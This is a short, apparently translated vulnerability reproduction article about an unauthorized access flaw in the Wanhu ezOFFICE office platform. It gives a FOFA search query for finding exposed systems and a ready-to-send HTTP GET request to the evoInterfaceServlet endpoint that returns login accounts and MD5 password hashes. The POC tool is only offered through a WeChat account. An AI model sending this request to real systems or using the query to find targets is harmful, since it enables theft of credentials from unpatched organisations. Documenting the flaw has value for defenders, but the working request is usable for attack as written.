Article Directory
Wanhu collaborative office platform ezoffice has an unauthorized access vulnerability with a POC
Disclaimer: Do not use the relevant technologies in this article to engage in illegal testing. Any direct or indirect consequences and losses caused by the dissemination and use of the information or tools provided in this article shall be borne by the user himself. Adverse consequences have nothing to do with the article author. This article is for educational purposes only.
1. Introduction to ezoffice, a collaborative office platform for thousands of households
WeChat official account search: Nanfeng Vulnerability Reappearance Library
This article was first published on the Nanfeng Vulnerability Reproduction Library official account
Wanhu ezOFFICE Group Edition collaborative platform has four core applications of workflow, knowledge management, communication and office assistance
2. Vulnerability description
Wanhu ezOFFICE collaborative management platform is a comprehensive information basic application platform. There is an unauthorized access vulnerability in the Wanhu ezoffice collaborative management platform. An attacker can obtain the system login account and the password encrypted with MD5 from the evoInterfaceServlet interface.
CVE number:
CNNVD number:
CNVD number:
3. Affect the version
4. fofa query statement
“Ezoffice”
5. Vulnerability recurrence
Vulnerability link: http://127.0.0.1/defaultroot/evoInterfaceServlet?paramType=user
Vulnerability Packet:
GET /defaultroot/evoInterfaceServlet?paramType=user HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
6.POC&EXP
Follow the official account Nanfeng Vulnerability Reproduction Library and reply Vulnerability Reproduction 45 to get the download address of the POC tool:
7. Rectification opinions
The manufacturer has not yet provided a bug fix solution, please pay attention to the manufacturer's homepage for timely updates: http://www.whir.net